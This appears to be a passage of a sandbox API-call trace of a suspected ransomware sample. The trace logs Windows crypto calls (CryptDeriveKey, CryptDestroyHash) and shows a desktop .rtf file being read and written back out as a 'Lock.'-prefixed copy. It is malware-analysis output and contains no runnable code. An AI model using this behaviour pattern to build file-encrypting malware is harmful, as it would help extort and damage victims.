PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.022] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.022] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.022] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.022] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.023] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.023] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.023] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.023] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0103.023] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.023] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0103.023] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.023] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.023] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0103.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9c70, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0103.023] CryptDeriveKey (in: hProv=0x9bf330, Algid=0x6601, hBaseData=0x9a3b80, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4440) returned 1 [0103.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.023] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.023] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0103.023] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.023] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0103.023] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0103.023] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0103.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f40, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0103.024] CryptDestroyHash (hHash=0x9a3b80) returned 1 [0103.024] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.024] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.024] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.024] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.024] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.024] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/MdUrzCG7I8VQVwhMz8.rtf" (normalized: "c:\\users\\fd1hvy\\desktop\\mdurzcg7i8vqvwhmz8.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0103.024] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.024] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0103.024] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.024] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.024] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.024] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0103.025] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.MdUrzCG7I8VQVwhMz8.rtf" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.mdurzcg7i8vqvwhmz8.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0103.025] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.025] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.026] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.026] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.028] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0103.028] ReadFile (in: hFile=0x458, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0xecc, lpOverlapped=0x0) returned 1 [0103.029] ReadFile (in: hFile=0x458, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0103.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0103.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xecc) returned 0x2ace888 [0103.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4ca9020 | out: hHeap=0x2af0000) returned 1 [0103.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0103.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0103.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0103.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0103.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0103.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0103.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0103.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0103.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xecc) returned 0x2acf760 [0103.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ace888 | out: hHeap=0x2af0000) returned 1 [0103.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0103.031] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0103.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0103.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0103.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0103.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0103.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xecc) returned 0x2ace888 [0103.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0103.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ace888 | out: hHeap=0x2af0000) returned 1 [0103.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0103.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0103.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0103.032] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0103.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0103.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0103.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0103.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0103.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0103.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0103.032] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0103.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0103.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0103.032] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0103.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0103.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0103.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0103.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a58 [0103.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0103.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0103.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0103.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0103.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xecc) returned 0x2ace888 [0103.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a730a8 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0103.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a715e8 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0103.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71718 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0103.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9790 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0103.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xecc) returned 0x2ad0638 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0103.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0103.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0103.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0103.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0103.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0103.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0103.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0103.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0103.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0103.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0103.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0103.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0103.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0103.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0103.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0103.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0103.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0103.034] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0103.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0103.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0103.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0103.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0103.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0103.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0103.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0103.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0103.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0103.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0103.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0103.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0103.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0103.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0103.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0103.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0103.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0103.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0103.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0103.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0103.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0103.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0103.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0103.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0103.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0103.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0103.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0103.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0103.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0103.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0103.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0103.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0103.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0103.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0103.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0103.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0103.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0103.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0103.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0103.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0103.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0103.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 